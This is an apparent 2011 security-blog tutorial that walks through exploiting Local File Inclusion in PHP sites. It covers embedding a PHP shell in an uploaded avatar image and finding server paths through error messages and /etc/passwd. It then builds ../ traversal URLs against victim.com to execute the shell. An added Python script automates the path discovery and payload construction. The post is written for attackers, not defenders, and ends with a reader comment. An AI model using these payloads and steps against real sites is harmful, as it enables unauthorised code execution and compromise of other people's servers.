
Wednesday, August 31, 2011

Step-by-Step Guide to LFI (Local File Inclusion): The Process of Exploiting a Website

This tutorial will guide you through the process of exploiting a website through LFI (Local File Inclusion): a PHP script that passes a user-controlled parameter straight to include() or require(), so the attacker decides which local file gets included and, if it contains PHP, executed. First, let's take a look at PHP code that is vulnerable to LFI:

PHP Code:

... program (all you need to do is right-click on the image, choose "Open with...", select the edjpgcom program, and then just type the code). OK, now that you have your shell in the image, all you need to do is upload it! If victim.com has a forum or something else that allows you to upload, great; if not, check whether it is on shared hosting, and if so do a reverse IP lookup on it to find the other sites served from the same machine.

Now that you have a list of potential sites that may have a forum or something else that allows you to upload your image, all you need to do is take some time to browse through them until you find one.

After you have found one and uploaded your image, here is the tricky part: you'll need to "create" an error on it (in order to find the server path to it). Try, for example, to provoke a MySQL error, and you will get something like this:

Quote: Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/sitefolder/public_html/includes/view.php on line 37

The path in the warning is the script's location on disk, so the account's web root here is /home/sitefolder/public_html. This only works when the site has display_errors switched on; if you can't force an error, go back to the /etc/passwd file (which the LFI itself lets you read):

Quote: username:kbeMVnZM0oL7I:503:100:FullName:/home/username:/bin/sh

As you can see, the sixth field is the home directory, and it is named after the username. Most of the time the name is similar to the domain name, but if that is not the case you'll have to try them one by one until you find the one you're looking for.

Go to your avatar image, right-click on it, and then Properties (write down the path to it); you're now all set up. In your browser type this (again, the number of ../ may vary; too many is harmless, because .. at / stays at /, so err on the high side):

Quote: victim.com/index.php?page=../../../../../../../../../home/the_other_site_dir/public_html/path_to_your_avatar/avatar.jpg

Here page stands in for whatever parameter name the vulnerable script passes to include(); the original only wrote index.php= and the real name depends on the target. In other words, it should look like this (using fictitious names):

Quote: victim.com/index.php?page=../../../../../../../../../home/arcfull/public_html/forum/uploads/avatar.jpg

After you request this URL, you will see the result of the code inserted in the image!
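The path-discovery and URL-building steps above, as an added Python example (not part of the original post). The warning text is the one quoted above; the /etc/passwd lines, the victim's script directory /home/victimco/public_html, the domain names and the parameter name page are constructed for the example, and resolve() assumes the relative include is resolved from the vulnerable script's directory, which is the usual case when include_path falls back to the current directory.

```python
import difflib
import posixpath
import re
from urllib.parse import quote

# Constructed samples of what the two path-discovery tricks hand back through the LFI.
MYSQL_WARNING = ("Warning: mysql_fetch_array(): supplied argument is not a valid MySQL "
                 "result resource in /home/sitefolder/public_html/includes/view.php on line 37")

PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
arcfull:kbeMVnZM0oL7I:503:100:Arc Full:/home/arcfull:/bin/sh
victimco:x:504:100::/home/victimco:/bin/sh
backup:x:505:100::/home/backup:/bin/false
"""


def docroot_from_error(warning: str):
    """Pull the script's on-disk path out of a PHP warning (only visible when
    display_errors is on) and cut it back to the account's web root."""
    m = re.search(r" in (/\S+?\.php) on line \d+", warning)
    if not m:
        return None
    path = m.group(1)
    if "/public_html/" in path:  # cPanel-style layout, as in the quoted warning
        return path.split("/public_html/")[0] + "/public_html"
    return posixpath.dirname(path)  # otherwise the best guess is the script's own directory


def home_dirs(passwd: str) -> dict:
    """Login accounts with a home under /home, as name -> home. Seven colon-separated
    fields: name, password hash (or x), uid, gid, gecos, home, shell."""
    accounts = {}
    for line in passwd.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, _pw, _uid, _gid, _gecos, home, shell = fields
        if home.startswith("/home/") and not shell.endswith(("nologin", "false")):
            accounts[name] = home
    return accounts


def best_match(accounts: dict, domain: str) -> str:
    """Rank account names by similarity to the domain's labels (the tutorial's
    'usually similar to the domain name' heuristic) and return the best one."""
    labels = [lbl for lbl in domain.lower().split(".") if lbl != "www"]

    def score(name: str) -> float:
        return max(difflib.SequenceMatcher(None, name.lower(), lbl).ratio() for lbl in labels)

    return max(accounts, key=score)


def lfi_url(base: str, param: str, target: str, depth: int = 9) -> str:
    """Build the traversal payload: depth x '../' followed by the absolute target minus its leading '/'."""
    payload = "../" * depth + target.lstrip("/")
    return f"{base}?{param}={quote(payload, safe='/')}"


def resolve(script_dir: str, payload: str) -> str:
    """Where the kernel actually lands: '..' above '/' stays at '/', so overshooting with
    extra '../' is harmless, while too few '../' lands somewhere under the victim's docroot."""
    return posixpath.normpath(posixpath.join(script_dir, payload))


if __name__ == "__main__":
    print(docroot_from_error(MYSQL_WARNING))
    homes = home_dirs(PASSWD_SAMPLE)
    owner = best_match(homes, "arcfull.com")
    target = homes[owner] + "/public_html/forum/uploads/avatar.jpg"
    print(lfi_url("http://victim.com/index.php", "page", target))
    for depth in (2, 3, 9):
        print(depth, resolve("/home/victimco/public_html", "../" * depth + target.lstrip("/")))
```

Running it shows depth 2 stopping at /home/home/arcfull/..., while depths 3 and 9 both resolve to the avatar, which is why guessing high on the number of ../ costs nothing.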

SOURCE: PINOY SECURITY

1 Visitor Reactions & Comments:

Berbaki said...

How to get this /test.php?